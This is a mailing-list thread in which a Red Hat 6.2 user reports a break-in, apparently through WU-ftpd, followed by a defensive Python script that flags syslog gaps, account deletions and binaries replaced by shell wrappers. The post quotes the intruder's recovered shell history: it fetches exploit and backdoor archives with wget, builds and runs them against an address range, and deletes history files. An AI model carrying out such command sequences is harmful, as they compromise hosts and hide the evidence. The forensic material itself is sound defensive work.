Dude, seems you are running an insecure version of WU-ftpd. Please update it and remove any other accounts created by the hacker. Regards, lilo
--- mails@munshi.dyndns.org wrote:
> Hello,
Well, I have been hacked and my /var/log/messages has next to nothing in it. I am keen on getting to the person who did it. Fortunately I have not lost any important data. But first, the proof that I have been hacked.
/var/log/messages (this is the first line):

Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp'
Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp'
Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$
The part after 6:24 is proper, but my net wasn't working at that time, so there are warning messages from my automatic IP updater from 6:24 onwards. (This is a normal thing and I do not suspect the hacker of doing it; it happens almost every day: I get logged out from my servers, the network is up but I can't access the internet, and others from the outside world can't access my PC.) What amazes me is that after an entry at 2:22am there is an entry at 6:24, so someone has definitely hacked in and deleted the middle section; he probably left the upper part just to misguide us.
The .bas* files were deleted, but unfortunately for the hacker the .bash_history has some important data in it:

cd /dev/ida/.sys/trojan
wget www.geocities.com/master0n/bestwu.tgz
tar zxvf bestwu.tgz
cd aw
make
./awu 24.132
cd ..
lsd
ls
rm -rf aw bestwu.tgz
ls
wget www.geocities.com/dont_haxer/b.tgz
tar zxvf b.tgz
rm -rf b.tgz
cd .b
./bash
./bash
cd /root
rm -rf .bas*
After that is what I had been doing. So that is the last entry.
So my .bash_profile has been deleted, and that is how I came to know that something is wrong. I have not rebooted my system as yet, and do not think it is necessary. There are a few other things that amaze me. Here they are:
1. The first is that the time from 2:22am to 6:24am is empty, whereas there should have been entries from ddclient, a program that I am running.

2. The /dev/ida/.sys directory should exist, since that is where the above commands have been run and there is no command in .bash_history that deletes that directory.

3. netstat -a and ps ax are not working, since the required libraries are not present, so I can't check which ports are open. The error given by netstat -a is

bash# netstat -a
sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23
cat: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23
egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23
cat: /root/.net: Too many open files in system

bash# ps ax
sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23
egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23
cat: /root/.pstmp: Too many open files in system
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory
cat: /root/.pstmp: No such file or directory

top is working fine but does not show me any problems.

4. wget was downloading Mandrake for me; it should have got disconnected since my net wasn't working, but it is still continuing to download the ISOs for me. Another amazing thing is that wget was downloading the 2nd ISO when I logged in, and it had just downloaded 114MB of it and switched over to the 3rd ISO.
INFO: Working on RH6.2, full installation. telnet was off, ssh is not there, and ddclient may have opened a few ports that I may not have noticed. I downloaded and installed ddclient just two days back, but it is a perl script and I have not yet gone through that script.
Please help me to find the person who did this. Thanks in advance.
Bye.
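A small triage helper, added here as an example and not part of this thread or of any tool the poster mentions. It does the two checks the post is really about from a defender's side: it parses syslog-style lines (the sample is constructed from the fragment above, with a placeholder host for the truncated ddclient line and an assumed year, since syslog omits it), reports any gap between consecutive entries larger than a threshold (the 2:22 to 6:24 hole), lists account-management events such as the userdel of `ftp`, and checks whether a file that should be a native binary is in fact a shell script, which is what the `sh: error in loading shared libraries` output from netstat and ps suggests. The two files it classifies are constructed in a temporary directory; the names and contents are the example's own.

```python
import os
import re
import tempfile
from datetime import datetime, timedelta

# Constructed sample of /var/log/messages, modelled on the fragment quoted in
# the post. The ddclient target host is a placeholder because the original line
# is truncated; syslog omits the year, so one is supplied when parsing.
SAMPLE_LOG = """\
Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp'
Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp'
Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.example.invalid
Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.example.invalid
Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.example.invalid
"""

SYSLOG_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<prog>[^\[:\s]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)

# Programs whose appearance in a log deserves a second look during triage.
ACCOUNT_PROGS = {"userdel", "useradd", "usermod", "groupdel", "groupadd"}


def parse_syslog(text, year):
    """Parse classic BSD-syslog lines into dicts carrying a real datetime."""
    entries = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue  # skip anything that does not look like a syslog line
        stamp = datetime.strptime(
            f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S"
        )
        entries.append({"time": stamp, "host": m["host"], "prog": m["prog"],
                        "pid": m["pid"], "msg": m["msg"]})
    return entries


def find_gaps(entries, max_gap):
    """Return (start, end, seconds) for consecutive entries further apart than max_gap."""
    gaps = []
    for prev, cur in zip(entries, entries[1:]):
        delta = cur["time"] - prev["time"]
        if delta > max_gap:
            gaps.append((prev["time"], cur["time"], int(delta.total_seconds())))
    return gaps


def account_events(entries):
    """Entries written by account-management tools (e.g. the userdel of `ftp')."""
    return [e for e in entries if e["prog"] in ACCOUNT_PROGS]


def classify_executable(path):
    """'elf' for a native binary, 'script' for a #! file, 'other' otherwise."""
    with open(path, "rb") as fh:
        head = fh.read(4)
    if head == b"\x7fELF":
        return "elf"
    if head[:2] == b"#!":
        return "script"
    return "other"


def demo_binary_check():
    """Classify two constructed files: a minimal ELF header and a shell wrapper
    standing in for a replaced system binary. Names and contents are made up."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        fake_elf = os.path.join(tmp, "netstat.good")
        fake_wrapper = os.path.join(tmp, "netstat.bad")
        with open(fake_elf, "wb") as fh:
            fh.write(b"\x7fELF\x01\x01\x01" + b"\x00" * 9)
        with open(fake_wrapper, "wb") as fh:
            fh.write(b"#!/bin/sh\n# constructed stand-in for a replaced binary\n")
        for path in (fake_elf, fake_wrapper):
            results[os.path.basename(path)] = classify_executable(path)
    return results


def triage(text, year=2001):
    """Run all three checks; 2001 is an assumed year for the undated sample."""
    entries = parse_syslog(text, year)
    return {
        "gaps": find_gaps(entries, timedelta(hours=1)),
        "account_events": account_events(entries),
        "binaries": demo_binary_check(),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    for start, end, secs in report["gaps"]:
        print(f"log gap: {start} -> {end} ({secs // 60} minutes without entries)")
    for e in report["account_events"]:
        print(f"account change: {e['time']} {e['prog']}: {e['msg']}")
    for name, kind in report["binaries"].items():
        print(f"{name}: {kind}")
```

On a real box `classify_executable` would be pointed at /bin/netstat and /bin/ps, but note the caveat the post itself demonstrates: on a host whose shared libraries have been tampered with, nothing run from that host can be trusted, so such checks belong on a copy of the disk mounted from clean boot media. On an RPM-based system like RH6.2, `rpm -V` against the owning packages (net-tools, procps) is the quicker first look, with the same caveat about running it from a clean environment.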